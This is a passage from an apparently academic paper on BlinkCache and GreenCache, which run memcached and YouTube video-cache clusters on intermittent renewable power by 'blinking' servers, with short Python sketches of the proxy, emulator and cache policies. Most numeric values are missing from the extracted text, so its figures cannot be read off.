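            idx = int(hashlib.md5(key.encode()).hexdigest(), 16) % len(self.servers)
            self.key_map[key] = self.servers[idx]
        self.hits[key] = self.hits.get(key, 0) + 1
        return self.key_map[key]

    def migrate_by_popularity(self):
        """re-pack keys in popularity order across servers in activity-rank order."""
        ranked = sorted(self.hits, key=self.hits.get, reverse=True)
        per_server = max(1, len(ranked) // len(self.servers))
        for i, key in enumerate(ranked):
            self.key_map[key] = self.servers[min(i // per_server, len(self.servers) - 1)]
```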
as discussed in 'blink prototype,' we use a cluster of ten mac minis for greencache. we use one mac mini to run the proxy and power manager, and run a cache server and power client on each of the other mac minis. the proxy connects to a wimax base station (nec rel. . ebs) through the switch. we use a linux laptop with a teltonika usb wimax modem as a client, and we also use a separate server to emulate multiple wimax clients. our emulator limits the wireless bandwidth in the same way as observed by the wimax card, and plays the youtube trace described below. the wimax base station is operational and located on the roof of a tall building on the umass campus; however, the station is currently dedicated to research purposes and is not open to the general public. since greencache requires one node (running the proxy and power manager), the switch, and the wimax base station to be active all the time, its minimum power consumption is w, or % of its maximum power consumption. to experiment with a wide range of video traffic, we wrote a mobile client emulator in java, which replays youtube traces. for each video request in the trace file, the emulator creates a new thread at the specified time to play the video for the specified duration. in addition, the emulator also generates synthetic video requests based on various configurable settings, such as the available bandwidth, the popularity distribution of videos (e.g., a zipf parameter), the viewing length distribution, and the recommended list distribution.

blink emulator
to study how the blinkcache and greencache designs scale with the cluster size, we write an emulator that emulates a server cluster. the emulator takes the number of servers, the servers' parameters (e.g., ram, ip address, port), the network bandwidth, and the application name as input parameters, and starts as many processes as the number of servers. each process emulates a node in the cluster, and the applications running on that node are started in separate threads within the process. for example, a blinking node in blinkcache is emulated by a process with two threads: one thread runs a power client while the other runs a memcached server.
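a minimal sketch of the emulator structure just described, assuming python's multiprocessing and threading in place of the original java implementation: one process per emulated node, with each application on that node running in its own thread inside the process. the blinking loop here is a toy stand-in; in the real emulator the power client follows directions from the power manager.

```python
import multiprocessing
import threading
import time

def power_client(node_id, blink_interval=60.0, duty_cycle=0.5):
    """toy stand-in: alternates the node between active and inactive each blink interval."""
    while True:
        time.sleep(duty_cycle * blink_interval)          # active portion of the interval
        time.sleep((1 - duty_cycle) * blink_interval)    # inactive portion of the interval

def cache_app(node_id):
    """placeholder for the per-node application (memcached server or greencache cache server)."""
    while True:
        time.sleep(1)

def emulate_node(node_id):
    threads = [threading.Thread(target=power_client, args=(node_id,), daemon=True),
               threading.Thread(target=cache_app, args=(node_id,), daemon=True)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

if __name__ == "__main__":
    # one process per emulated node; scale the range up to emulate larger clusters
    nodes = [multiprocessing.Process(target=emulate_node, args=(i,)) for i in range(10)]
    for p in nodes:
        p.start()
```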
the power manager takes the power trace from our field deployment and scales up the trace to bring the average power at % of the power necessary to run all nodes concurrently. to emulate blinking of a node the power client sends the process to the sleep state and active state as directed by the power manager. we run our blink emulator on a mac mini running linux kernel . . with . ghz intel core duo processor and gb of ram. the emulator starts up to , processes to emulate , blinking nodes. we use benchmark results from our low-power server cluster to set application-level configuration parameters, such as request rate, access latency, transition latency, power consumption, zipf parameter, servers to proxy ratio etc., for applications running on the blink emulator. as in our real cluster all modules and applications communicate over tcp/ip. further, to run a memcached server in a thread, rather than in a process, we write a small memcached emulator that emulates basic operations (single-key get and put) of memcached with similar latencies as observed with a real memcached server in our evaluation (‘evaluation’). sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. power signal we program our power supplies to replay solar and wind traces from our field deployment of solar panels and wind turbines. we also experiment with both multiple steady and oscillating power levels as a percentage, where % oscillation holds power steady throughout the experiment and n % oscillation varies power between ( + . n )% and ( − . n )% every five minutes. we combine traces from our solar/wind deployment, and set a minimum power level equal to the power necessary to operate the always-active components. we compress our renewable power signal to execute three days in three hours, and scale the average power to % of the cluster’s maximum power. evaluation we evaluate blinkcache and greencache on our small-scale blink prototype from ‘blink prototype’. the purpose of our evaluation is not to maximize the performance of a particular deployment of our applications—memcached and multimedia cache—or improve on the performance of the custom deployments common in industry. instead, our goal is to explore the effects of churn on the applications caused by power fluctuations for different design alternatives. our results will differ across platforms according to the specific blink interval, cpu speed, and network latency and bandwidth of the servers and the network. since our prototype uses low-power cpus and motherboards, the request latencies we observe in our prototype are not representative of those found in high performance servers. blinkcache evaluation we first use our workload generator to benchmark the performance of each blinking policy for both zipf-like and uniform popularity distributions at multiple power levels with varying levels of oscillation. we then demonstrate the performance for an example web application—tag clouds in glassfish—using realistic traces from our energy harvesting deployment that have varying power and oscillation levels. unless otherwise noted, in our experiments, we use moderate-size objects of kb, facebook-like zipf α values of . , and memcached’s consistent hashing mapping function. each experiment represents a half-hour trace, we configure each memcached server with a mb cache to provide an aggregate cache size of gb, and we use our programmable power supply to drive each power trace. 
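the oscillating power signals described above can be generated with a few lines of code. the sketch below assumes an oscillation that swings the power symmetrically around its average every fixed period; the exact constants (average power, period, swing) are placeholders, since the measured values are elided in the text.

```python
def oscillating_power(avg_power, oscillation_pct, period_s, duration_s, step_s=1.0):
    """n% oscillation alternates power between (100 + n/2)% and (100 - n/2)% of the average
    every period_s seconds; 0% oscillation holds power steady (assumed interpretation)."""
    high = avg_power * (1 + oscillation_pct / 200.0)
    low = avg_power * (1 - oscillation_pct / 200.0)
    trace, t = [], 0.0
    while t < duration_s:
        level = high if int(t // period_s) % 2 == 0 else low
        trace.append((t, level))
        t += step_s
    return trace

# example: 40% oscillation around 500 W, switching every five minutes, for half an hour
trace = oscillating_power(500.0, 40, 300, 1800)
```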
since each node has only mb of memory, we scale our workloads appropriately for evaluation. benchmarks we measure the maximum power of each node, at % cpu and network utilization, in s to be . w and its minimum power in s to be . w. we use these values in the proxy to compute the length of active and inactive periods to cap power consumption at a specific level. we also measure the impact of our node’s near s transition latency for blink intervals t between s and min. figure shows the results for a duty cycle of %. in this case, the blinking interval must be over s before average power over the interval falls below % of the node’s maximum power, as we expect. the result shows that on-demand sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the near s latency to transition into and out of s in our prototype discourages blinking intervals shorter than roughly s. with a % duty cycle we expect to operate at % full power, but with a blink interval of less than s we operate near % full power. transitions that occur whenever work arrives or departs are not practical in our prototype. further, even blinking intervals as high as s impose significant power inefficiencies. as a result, we use a blinking interval of s for our experiments. our s blink interval is due solely to limitations in the blink prototype. note that there is an opportunity to significantly reduce blink intervals through both hardware and software optimizations. since server clusters do not typically leverage acpi’s s state, there has been little incentive to optimize its transition latency. next, we determine a baseline workload intensity for memcached, since, for certain request rates and key sizes, the proxy or the switch becomes a bottleneck. in our experiments, we use a steady request rate ( , get requests/s) that is less than the maximum request rate possible once the proxy or switch becomes a bottleneck. note that our results, which focus on hit rates, are a function of the popularity of objects rather than the distribution of request inter-arrival times. our goal is to evaluate how blinking affects the relative hit rates between the policies, and not the performance limitations of our particular set of low-power components. figure demonstrates the maximum performance, in terms of total throughput and request latency for different key values sizes, of an unmodified memcached server, our memcached proxy, and a mysql server. as expected, the memcached server provides an order of magnitude higher throughput and lower request latency than mysql. further, our proxy implementation imposes only a modest overhead to both throughput and latency, although the latency impact of proxy-based redirections will be greater on faster cpus since less relative request time is spent in the os and network. our subsequent experiments focus on request hit rates rather than request latencies, since latencies vary significantly across platforms and workloads. further, the wide disparity in latency between serving a request from memory and serving it from disk would show a larger, and potentially unfair, advantage for a blinking sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure maximum throughput (a) and latency (b) for a dedicated memcached server, our mem- cached proxy, and a mysql server. our proxy imposes only a modest overhead compared with a dedicated memcached server. 
(a) throughput. (b) latency. system. thus, we consider hit rate a better metric than latency for evaluating a blinking memcached instance. activation blinking and thrashing an activation policy for an unmodified version of memcached must choose whether or not to alter the hash-based mapping function as it activates and deactivates servers. for constant power, a dynamic mapping function that always reflects the currently active set of servers should provides the best hit rate, regardless of the popularity distribution, since applications will be able to insert the most popular keys on one of the active servers. figure a demonstrates this point for a workload with a zipf popularity distribution (α = . ), and shows the hit rates for both static and dynamic activation variants at multiple constant power levels. while at high power levels the approaches have similar hit rates, as power level decreases, we see that the static variant incurs a higher penalty under constant power. however, fig. b demonstrates that the opposite is true for highly variable power. the figure reports hit rates for different levels of power oscillation, where the average power for each experiment is % of the power necessary to run all nodes concurrently. the x-axis indicates oscillation level as a percentage, such that % oscillation holds power steady throughout the experiment and n % oscillation varies power between ( + . n)% and ( − . n)% every min. we see that dynamic changes in the active server set of memcached’s hash-based mapping function incur an invalidation penalty. since the invalidation penalty does not occur when memcached does not change the mapping function, the static variant provides a significantly better hit rate as the oscillations increase. although not shown here, the difference with the original modulo approach is much greater, since each change flushes nearly the entire cache. the hash-based mapping function forces a choice between performing well under constant power or performing well under variable power. a table-based approach that uses our proxy to explicitly map keys to servers and uses key migration to increase the priority of popular keys performs better in both scenarios. that is, the approach does not incur invalidation penalties under continuously variable power, or result in low hit rates under constant power, as also shown in figs. a and b. note sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure hit rate with activation policy under constant and oscillating power for a zipf popularity distribution. (a) constant power. (b) variable power. figure comparison of fairness and hit rate with synchronous policy and activation policy for a uniform popularity distribution. (a) standard deviation with constant power. (b) hit rate with constant power. that oscillation has no impact on other policies, e.g., those using key migration or the synchronous policy. synchronous blinking and fairness while the activation policy with key migration results in the highest hit rate overall, it is unfair when many servers store equally popular objects since the policy must choose some subset of equally popular servers to deactivate. 
figure a quantifies the fairness of the dynamic activation policy, the activation policy with key migration, and the synchronous policy, as a function of standard deviation in average per-object latency, at multiple constant power levels for a uniform popularity distribution where all objects are equally popular. note that for distributions where all objects are equally popular, key migration is not necessary and is equivalent to using the static variant of hash-based mapping. the synchronous policy is roughly x more fair than the activation policy with key migration at all power levels. while the dynamic hash-based mapping is nearly as fair as the synchronous policy, it has a worse hit rate, especially in high-power scenarios, as shown in fig. b. thus, the synchronous policy, which is more fair and provides lower average latency, is a better choice than any variant of the activation policy for uniform popularity sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of fairness and hit rate with load proportional policy, synchronous policy and activation policy for a zipf popularity distribution. (a) standard deviation with constant power. (b) hit rate with constant power. distributions. note that the key popularity distribution across servers in every memcached cluster that uses a hash-based mapping function is uniform, since keys map to servers randomly. thus, the synchronous policy is the best choice for a heavily-loaded memcached cluster that cannot tolerate the throughput penalty of using proxies. balancing performance and fairness activation with key migration results in the maximum hit rate for skewed popularity distributions where some objects are significantly more popular than others, while the synchronous policy results in the best overall performance, in terms of both hit rate and fairness, for uniform popularity distributions. the proportional policy combines the advantages of both and works well for zipf-like distributions with a few popular objects but a long tail of similarly (un)popular objects, since the long heavy tail in isolation is similar to the uniform distribution. figure b shows the hit rate for the proportional policy, the activation policy with migration, and the synchronous policy for a zipf popularity distribution with α = . at different power levels. the synchronous policy performs poorly, especially at low power levels, in this experiment, since it does not treat popular objects different than unpopular objects. however, the proportional policy attains nearly the same hit rate as the activation policy at high power levels, since it also prioritizes popular objects over unpopular objects. even at low power levels its hit rate is over % of the activation policy’s hit rate. further, the proportional policy is significantly more fair to the many unpopular objects in the distribution. figure a reports fairness, in terms of the standard deviation in per-object latency, at different power levels for the unpopular keys, i.e., keys ranked in the bottom th percentile of the distribution. the activation policy’s unfairness is nearly x worse at low power levels. thus, the proportional policy strikes a balance between performance and fairness when compared against both the synchronous and activation policies. finally, fig. shows how the s transition overhead affects our results at a moderate power level. 
the figure shows that the overhead has only a modest effect on the load-proportional policy’s hit rate. the overhead does not affect the relative fairness of the policies. note that all of our previous experiments use our prototype’s s transition sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure as s transition overhead increases, the hit rate from the load-proportional policy de- creases relative to the activation policy with key migration for a zipf distribution at a moderate power level. overhead. a shorter transition overhead would improve our results, and even a longer transition would show some, albeit lesser, benefits. case study: tag clouds in glassfish while our prior experiments compare our blinking policies for different power and oscillation levels, we also conduct an application case study using traces from our energy harvesting deployment. the experiment provides a glimpse of the performance tradeoffs for realistic power signals. glassfish is an open source java application server from sun, which includes a simple example application that reuses parts of the java petstore multi-tier web application, used in prior research, e.g., cohen et al. ( ), to create tag clouds for pets. tag clouds are a set of weighted tags that visually represent the most popular words on a web page. we modify the default web application to generate html for per-user tag cloud pages and cache them in memcached. the data to construct each html page comes from a series of sequential requests to a mysql database. for these experiments, we measure the latency to load user tag cloud pages, which incorporates mysql and html regeneration latencies whenever html pages are not resident in the cache. the mysql latency for our simple table-based data is typically ms per database query. while page load latency follows the same trend as hit rate, it provides a better application-level view of the impact of different policies. figure b shows the average latency to load user web pages across , users for our three different policies—activation with key migration, proportional, and synchronous—for a combined solar and wind trace, assuming the popularity of each user’s tag cloud page follows a zipf distribution with α = . . we derive the power signal, shown in fig. a, by compressing a -day energy harvesting trace to h. as expected, the activation policy with key migration and the load-proportional policy exhibit comparable page load latencies at most points in the trace. for this trace, the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure power signal from a combined wind/solar deployment (a) and average page load latency for that power signal (b). (a) power. (b) page load latency. load-proportional policy is within % of the activation policy’s hit rate. the activation policy is slightly better at low energy levels, since it tends to strictly ensure that more popular content is always cached. also as expected, the synchronous policy tends to perform poorly across all power levels. also as expected, we measure the standard deviation of page load latencies for the load-proportional policy to be within % to the synchronous policy for the vast majority, i.e., bottom %, of the equally unpopular objects. 
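the case-study page loads follow a standard cache-aside pattern: serve the pre-rendered html from memcached when present, otherwise regenerate it from mysql and re-insert it into the cache. a minimal sketch follows; the renderer, query, and key format are illustrative assumptions, not the glassfish application's actual code.

```python
def render_tag_cloud(rows):
    # trivial html rendering: font size scaled by tag weight
    return "<div>" + " ".join(f'<span style="font-size:{10 + w}px">{tag}</span>'
                              for tag, w in rows) + "</div>"

def load_tag_cloud(user_id, cache, db):
    """cache-aside load of a per-user tag cloud page; a miss pays the mysql and regeneration latency."""
    key = f"tagcloud:{user_id}"
    html = cache.get(key)
    if html is None:
        rows = db.query("SELECT tag, weight FROM tags WHERE user_id = %s", (user_id,))
        html = render_tag_cloud(rows)
        cache.set(key, html)
    return html
```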
blinkcache scalability to see how our blinkcache design performs for a large server cluster we use the blink em- ulator from ‘implementation’ to emulate a cluster of , nodes. we use the benchmark results from above to set the throughput, access latency, and power consumption of servers. as described above, each proxy can serve memcached servers and give a maximum throughput of , requests/s. so, assuming the same throughput per proxy we select proxies for our , node cluster which can give an aggregate maximum throughput of , requests/s. we use the same memcached client and request trace that we used for the evaluation of our real cluster. as the number of proxies depend on the total number of active servers the activation policy activates/deactivates a number of proxies as it varies the number of active servers. to avoid migration of the key→server mappings from an inactive proxy to active ones we store all key→server mappings on each proxy. as each mapping requires only bytes the overhead of storing all is minimal. a memcached client uses a simple mapping function—hash(key)%numberproxies—to map a key to one of the proxies. if the number of active proxies changes a key previously mapped to a proxy might now map to a different proxy, which might not have the correct key→server mapping for that key. so, to reduce the overhead we sync the hash table (key→server mappings) of active proxies whenever their count changes. first we evaluate the maximum throughput of the cluster at different power levels. as shown in fig. the maximum throughput increases linearly with the available power which dictates the maximum number of active nodes. next, we evaluate the performance of aforementioned blinking policies—activation with key migration, synchronous, sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure throughput of a , node cluster with each node having the maximum throughput of , req/s. load-proportional with key migration—at various steady and oscillating power levels. comparing fig. a with fig. b it becomes clear that the performance (or relative performance) of different blinking policies does not vary much (within ± %) with the cluster size. further, the load-proportional policy performs better than the activation policy at high power for a large cluster, in construct to a small cluster of nodes, as the key migration overhead dominates the performance gain due to keeping the popular keys on always-active servers for a large cluster at high power. but, like a small cluster, the performance gain dominates the migration overhead for the activation policy at low to medium power even for a large cluster. figure b shows the hit rate for these three blinking policies for different oscillation levels from the % of full power. as expected, the hit rate for the activation policy drops down when the oscillation level increases because the migration overhead increases with the oscillation level. but, for the synchronous and load-proportional policies the hit rate remains the same at all oscillation levels because they don’t incur any migration overhead. greencache evaluation we first benchmark greencache’s proxy and chunking overhead for our prototype. we then evaluate greencache’s performance for real-world youtube traces at multiple power levels with varying levels of oscillation. 
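a small sketch of the scaled-up blinkcache request path described above: the client picks a proxy with hash(key) % number-of-proxies, and every proxy keeps a full copy of the key-to-server table, which is re-synchronized whenever the number of active proxies changes (names and structures are ours).

```python
import hashlib

def proxy_for(key, num_active_proxies):
    """client-side mapping: hash(key) % number of active proxies."""
    return int(hashlib.md5(key.encode()).hexdigest(), 16) % num_active_proxies

class ProxyPool:
    """every proxy holds the complete key -> server table, so a key that hashes to a
    different proxy after the active-proxy count changes still resolves to the right server."""

    def __init__(self, num_proxies):
        self.tables = [dict() for _ in range(num_proxies)]
        self.active = num_proxies

    def set_active(self, n):
        if n != self.active:
            self._sync_tables()
            self.active = n

    def _sync_tables(self):
        merged = {}
        for table in self.tables:
            merged.update(table)
        for table in self.tables:
            table.clear()
            table.update(merged)
```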
we then demonstrate the performance using realistic power traces from our energy harvesting deployment that have varying power and oscillation levels. we use two metrics to measure the performance: ( ) bandwidth usage between the cache and youtube servers and ( ) average buffering or pause time at the clients. bandwidth usage denotes the total data received from backend servers over a given time interval; it also represents bandwidth cost that mobile operators must pay to internet service providers. one primary objective of greencache is to reduce this bandwidth usage. another key objective of greencache is to improve user’s viewing sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of hit rate with load-proportional policy, synchronous policy and activation policy for a zipf popularity distribution. (a) steady power. (b) oscillating power. experiences. therefore, we consider average buffering time per video as our second metric to measure the performance. note that our implementation tries to optimize both metrics independent of each other. however, optimizing for bandwidth usage does not depend on the power level, but on the total cache size, while optimizing for buffering time depends on both the cache size and the power level. benchmarks to measure the proxy’s overhead, our client emulator creates a single thread and sends multiple video requests in succession. the breakdown of the latency overhead at each component for a sample mb video chunk of min play length, assuming a kbps bit rate, is ms at the proxy, ms at the cache server, ms in the network between the proxy and cache server, and ms in the network between the proxy and client. the result demonstrates that the proxy’s latency overhead is low. we also benchmark average buffering time for different blink intervals at various power levels. table shows the standard deviation, th percentile, and average buffering time for video requests, as the blink interval and power levels change. as expected, the buffering time increases with the blink interval at low to moderate power levels. we also benchmark the standard deviation, th percentile, and average buffering time for requests going to youtube servers, which are as ms, ms, and ms, respectively. to study the performance of our prototype cache for different cache sizes and power levels we take a h trace (from pm to pm on february th, ) from our day youtube trace. the trace contains a total of , requests, for , unique videos, over the h interval. our trace reports the url, video id, client ip address, and request time for each video. in addition, we pull the recommended list for each video in the trace from the youtube servers. based on the video id, its recommended list, client ip address, and the next requested video id, we calculate the viewing length for each video. we assume the average video length as min and the streaming rate as kbps. also, we fix the downlink bandwidth from backend youtube servers to the wimax station to mbps, and the storage capacity of each cache server as gb. further, we fix the blink interval as s. we use a weighing factor of . for the proposed popularity-aware eviction policy. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table standard deviation, th percentile, and average buffering time at different power levels and blink intervals. 
first, we study the performance (bandwidth usage and buffering or pause time for clients) for different numbers of cache servers at full power, for the real-world h youtube trace as well as for a synthetic trace of , requests in which each request is for a randomly chosen video from the aforementioned , unique videos. in addition, we use the least-recently-used (lru) cache eviction policy for this experiment, and videos are not chunked. figure plots the total bandwidth usage and average buffering time for both the random and real traces. we also plot the optimal performance for the real traces assuming we know all requests in advance; the optimal policy always keeps the most popular videos in the cache and never evicts a popular video to store a less popular one (over a given interval). as expected, the total bandwidth usage and average buffering time over the h interval decrease as the size or number of servers increases.

next, to study the benefits of video chunking, we measure the performance of three different cache eviction policies (lru, popularity-aware, and optimal) for the h real trace at full power with cache servers. figure shows that the performance of greencache's popularity-aware eviction policy is better (∼ %) than that of lru. further, video chunking improves (> %) the performance of all policies, as it avoids storing unpopular chunks of popular videos. in all cases, lru performs worse than the others, which motivates our use of a popularity-aware cache eviction policy and video chunking for all further experiments.

figure: both bandwidth usage and buffering time reduce with increasing cache size. (a) bandwidth usage. (b) buffering time.
figure: video chunking reduces both bandwidth usage and buffering time. (a) bandwidth usage. (b) buffering time.

staggered load-proportional blinking
as discussed earlier, the total bandwidth usage over a fixed interval does not depend on the available power level or on the blinking and layout policies, as long as a request does not go to the backend servers for an already cached video; it depends only on the cache size and eviction policy. however, buffering time and the user's experience do depend on the available power and on the blinking and layout policies. in this section, we study the effect of the power level on the average buffering time, along with various optimizations designed to reduce the buffering time. we use the same h real youtube trace, as discussed above, and cache servers for all further experiments; further, we use video chunking and the popularity-aware eviction policy in all experiments. to compare the proposed staggered load-proportional policy with the activation and load-proportional policies, we also implement an activation policy and a load-proportional policy for greencache and integrate them with greencache's popularity-aware eviction policy, video chunking, and popularity-aware migration policy. the activation policy activates or deactivates servers as power varies, whereas the load-proportional policy distributes the available power to servers in proportion to their popularity.
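to make the eviction comparison above concrete, the following is a small trace-replay sketch that counts origin fetches (a stand-in for backend bandwidth usage) for a fixed-capacity chunk cache under lru and under a simplified popularity-aware policy. it uses raw access counts rather than the ewma defined earlier, and all names are ours.

```python
from collections import OrderedDict, defaultdict

def replay(trace, capacity, policy="lru"):
    """replay (video_id, chunk_idx) requests against a chunk cache of `capacity` entries.
    'lru' evicts the least recently used chunk; 'popularity' evicts the least frequently
    accessed cached chunk (a simplified stand-in for the ewma popularity)."""
    cache = OrderedDict()
    counts = defaultdict(int)
    origin_fetches = 0
    for key in trace:
        counts[key] += 1
        if key in cache:
            cache.move_to_end(key)
            continue
        origin_fetches += 1                  # miss: the chunk must be fetched from the origin server
        if len(cache) >= capacity:
            if policy == "lru":
                cache.popitem(last=False)
            else:
                victim = min(cache, key=lambda k: counts[k])
                del cache[victim]
        cache[key] = True
    return origin_fetches
```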
similar to the load-proportional policy, the activation policy also migrates popular chunks to active servers while deactivating servers due to the drop in the power level. unlike the proposed staggered load-proportional policy, the load-proportional policy does not replicate video chunks because it does not benefit from replication as it activates all servers at the same time every blink interval. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure buffering time at various steady and oscillating power levels. (a) steady power. (b) oscillat- ing power. figure a shows the average buffering time at different steady power levels. as expected, the activation policy performs better than the load-proportional policy at low power levels since, unlike the load-proportional policy, the activation policy does not incur the blinking overhead, which becomes significant in comparison to the active interval at low power levels. however, at moderate to high steady power levels, the benefit of a larger cache size, albeit blinking, dominates the blinking overhead for real-world traces. furthermore, the buffering time decreases significantly if first chunks are replicated on all servers. even at low power levels, replication of initial chunks significantly reduces the buffering time, while still leveraging the benefits of a larger cache size. moreover, the performance of the staggered load-proportional policy remains almost the same at all power levels. as video popularity changes infrequently, migration overheads in our experiments are modest (∼ %). figure b compares the average buffering time for the above policies at different oscillating power levels. we oscillate available power every five minutes. since migration overhead of the staggered proportional policy is independent of power level, its perfor- mance remains almost the same at all oscillation levels. however, the activation policy incurs migration overhead whenever the number of active servers decreases. consequently, the activation policy performs poorly at high oscillation levels, as indicated in the figure. though replication of initial chunks reduces the buffering time at all power levels, it is primarily required at low power levels. next, we evaluate the benefits of prefetching initial chunks of related videos. as fig. indicates, prefetching initial chunks of the top five videos reduces the buffering time by % as compared to no prefetching. further, since prefetching more videos doesn’t improve the buffering time, we limit the cache to prefetching only first chunks of top few videos from the related list. we choose to prefetch top five videos only in order to strike a balance between the performance gain and prefetching overhead. case study to experiment with our wimax base station using a real wimax client, we use a linux desktop with intel atom cpu n processor and gb ram connected to teltonika usb wimax modem. we disable all network interfaces except the wimax interface. the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure buffering time decreases as the number of prefetched videos (first chunk only) from related lists increases. desktop connects to the wimax base station (nec rel. . ebs), which we configure to route all video requests from the desktop to the proxy. 
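the prefetching evaluated above only ever touches the first chunk of the top few recommended videos; a minimal sketch follows (the function names and the fetch callback are illustrative).

```python
def prefetch_recommended(cache, fetch_first_chunk, recommended_ids, top_k=5):
    """prefetch the first chunk of the top-k videos on the recommended list,
    skipping any first chunk that is already cached (top_k=5 mirrors the evaluation above)."""
    for video_id in recommended_ids[:top_k]:
        key = (video_id, 0)                   # chunk index 0 = the video's first chunk
        if key not in cache:
            cache[key] = fetch_first_chunk(video_id)
```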
we replay the same h youtube trace on the wimax client, but we use real power traces from our solar/wind deployment, as described in the previous section, to power the greencache cluster. figure plots average buffering time, calculated every five minutes, for three blinking policies: activation, load proportional, and staggered load proportional with first chunks replicated. as expected, the performance of all three policies goes down (buffering time goes up) when the available power drops down, and vice versa. however, the performance of activation degrades more than that of load-proportional when the available power drops down, since the activation policy incurs migration overhead when the number of active servers decreases. further, replicating first chunks significantly reduces the buffering time for the staggered load-proportional policy at all power levels. since the migration overhead of the staggered load-proportional policy is independent of power levels, its performance does not vary much, not even when the available power changes significantly, if first chunks are replicated. greencache scalability next, we use the blink emulator to study how greencache performs on a cluster of , nodes for the youtube dataset and user request trace described above. we run all blink and greencache modules as described above, and use the benchmark results to set the throughput, access latency, and power consumption of servers. figures a and b show the average latency and bandwidth, respectively, at various power levels. as expected, both the average latency and bandwidth cost reduce with increasing power levels as the number of active nodes or the total cache size increases with the power level. figure a shows the buffering time for the aforementioned blinking policies at three different steady power levels. as expected, the staggered load-proportional policy performs best at all power levels due to the replication of first chunk of all videos. the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure buffering time at various power levels for our combined solar/wind power trace. figure latency and bandwidth cost on , node cluster for youtube video requests with steady available power. (a) average latency in video requests. (b) average bandwidth cost in video requests. load-proportional policy recalculates the popularity of chunks every , requests and migrates popular chunks to mostly active servers. comparing figs. a and a it is evident that the relative performance of different policies does not vary much with the cluster size. similarly, figs. b and b indicates that all three blinking policies give similar performance (or relative performance) for a small as well as a large cluster. related work the sensor network community has studied strategies for dealing with variable sources of renewable power, since these systems often do not have access to the power grid. however, since sensor networks are geographically distributed, each node must harvest its own energy, resulting in network-wide energy imbalances (fan, zheng & sinha, ), whereas sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure buffering time with activation policy, load proportional policy, and staggered load propor- tional policy. (a) steady power. oscillating power. data center nodes share a common power delivery infrastructure. 
further, the primary performance metric for a sensor network is the amount of data the network collects. as a result, much of the energy harvesting work is not directly applicable to data centers. similarly, mobile computing generally focuses on extending battery life by regulating power consumption (zeng et al., ), rather than modulating performance to match energy production. the increasing energy consumption of data centers (us environmental protection agency, ) has led companies to invest heavily in renewable energy sources (miller, ; stone, ). for example, the goal of google’s re < c initiative is to make large-scale renewable power generation cheaper than coal-based production. as a result, researchers have started to study how to incorporate renewables into a data center’s power delivery infrastructure (stewart & shen, ). as one example, lee et al. ( ) use request redirection to control the carbon footprint of data centers by redirecting load to servers powered by renewable energy sources. while not directly related to energy harvesting, power routing (pelley et al., ) proposes shuffled power delivery topologies that allow data centers to control how much power each rack receives. while the topologies are well-suited for delivering variable amounts of power to racks based on aggregate demand, they are also useful for flexible routing of a variable power supply. prior research on workload-driven approaches to improve data center energy efficiency is orthogonal to our work. examples include designing platforms that balance cpu and i/o capacity (anderson et al., ; rivoire et al., ), routing requests to locations with the cheapest energy (qureshi et al., ), and dynamically activating and deactivating nodes as demand rises and falls (chase et al., ; tolia et al., ; krioukov et al., ). powernap’s node-level energy proportional technique has also been viewed as a workload-driven optimization (meisner, gold & wenisch, ). we show that a similar technique is useful for controlling per-node power consumption in a power-driven system. power capping has also been studied previously in data centers to ensure collections of nodes do not exceed a worst-case power budget (ranganathan et al., ; fan, weber & barroso, b). however, the work assumes exceeding the power budget is a rare transient event that does not warrant application-specific modifications, and that traditional sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. power management techniques, e.g., dvfs, are capable of enforcing the budget. these assumptions may not hold in many scenarios with intermittent power constraints, as with our renewable energy power source. gandhi et al. ( ) cap cpu power by forcing cpu idle periods. while similar, blinking focuses on capping per-node power where the cpu is only one component of the total power draw. improving the energy-efficiency of storage is also a related research area. while memcached does not offer persistent storage, our modifications for blinking adapt similar ideas from prior storage research, such as migrating popular objects to more active nodes (pinheiro & bianchini, ; zhu et al., a). additionally, power-aware caching algorithms focus on maximizing the idle time between disk accesses to reduce disk power consumption, while our work focus on controlling the power consumption of the cache itself (zhu et al., b). 
